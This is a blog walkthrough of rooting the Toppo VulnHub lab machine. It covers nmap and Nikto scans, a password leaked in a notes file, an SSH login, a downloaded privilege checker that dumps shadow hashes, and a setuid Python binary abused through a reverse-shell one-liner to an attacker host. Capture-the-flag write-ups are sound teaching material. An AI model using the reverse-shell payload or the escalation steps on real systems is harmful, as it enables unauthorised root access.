This page looks best with JavaScript enabled

Toppo

 ·  🎃 kr0m

Continuing with my articles on hacking vulnerable VMs, today we will achieve root access on a machine called Toppo. The process is not extremely complex but it has its tricks.

We download the VBox image from VulnHub or alfaexploit:
https://www.vulnhub.com/entry/toppo-1,245/
Toppo.vmdk

We take a look at the offered services:

RX4 ☢ /home/kr0m> nmap -sT 192.168.20.103 -p 0-65535

Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-03 16:46 CEST
Nmap scan report for 192.168.20.103
Host is up (0.00056s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
56149/tcp open  unknown
MAC Address: 08:00:27:52:19:08 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds

We launch Nikto to see what it shows us:

RX4 ☢ /home/kr0m/nikto/program> ./nikto.pl -h http://192.168.20.103

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.20.103
+ Target Hostname:    192.168.20.103
+ Target Port:        80
+ Start Time:         2018-09-03 16:48:23 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x1925 0x563f5cf714e80
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.25). Apache 2.2.31 is also current for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7796 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2018-09-03 16:48:32 (GMT2) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Accessing through Firefox we see that there is a file called notes.txt

RX4 ☢ /home/kr0m> curl http://192.168.20.103/admin/notes.txt

Note to myself :
I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer .

With a little luck we have access:

RX4 ☢ /home/kr0m> ssh ted@192.168.20.103 

ted@192.168.20.103's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 15 12:33:00 2018 from 192.168.0.29
ted@Toppo:~$ id
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

We download linuxprivchecker:

wget http://www.securitysift.com/download/linuxprivchecker.py
chmod 700 linuxprivchecker.py

python linuxprivchecker.py

[+] Shadow File (Privileged)
 root:$6$5UK1sFDk$sf3zXJZ3pwGbvxaQ/1zjaT0iyvw36oltl8DhjTq9Bym0uf2UHdDdRU4KTzCkqqsmdS2cFz.MIgHS/bYsXmBjI0:17636:0:99999:7:::
 ted:$6$P3kGAn0I$Yh0kqMyxQUd6wrBkWWZtlN30Xk4/UONrWecpA3D2o5OX12ZdWhdNt45KG0uiX3QlrcAgAFmoYHXbibaGEHkaK/:17777:0:99999:7:::

Is the python script able to dump the shadow without permissions?

ted@Toppo:~$ cat /etc/shadow

cat: /etc/shadow: Permission denied

We keep investigating:

ted@Toppo:~$ ls -la /usr/bin/python

lrwxrwxrwx 1 root root 9 Mar 16 2015 /usr/bin/python -> python2.7
ted@Toppo:~$ ls -la /usr/bin/python2.7
-rwsrwxrwx 1 root root 3889608 Aug 13 2016 /usr/bin/python2.7

That setUID is good, once again we see how incorrectly assigned permissions can compromise the entire system.

We try to launch a shell from the Python interpreter:

ted@Toppo:~$ python -c “import pty;pty.spawn(’/bin/bash’)”

bash-4.3$ id

uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
bash-4.3$ cat /etc/shadow
cat: /etc/shadow: Permission denied

Let’s try a reverse connection:

RX4 ✺ ~> nc -l -p 1234

ted@Toppo:~$ python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.20.114”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);’

RX4 ✺ ~> nc -l -p 1234

# id

uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
If you liked the article, you can treat me to a RedBull here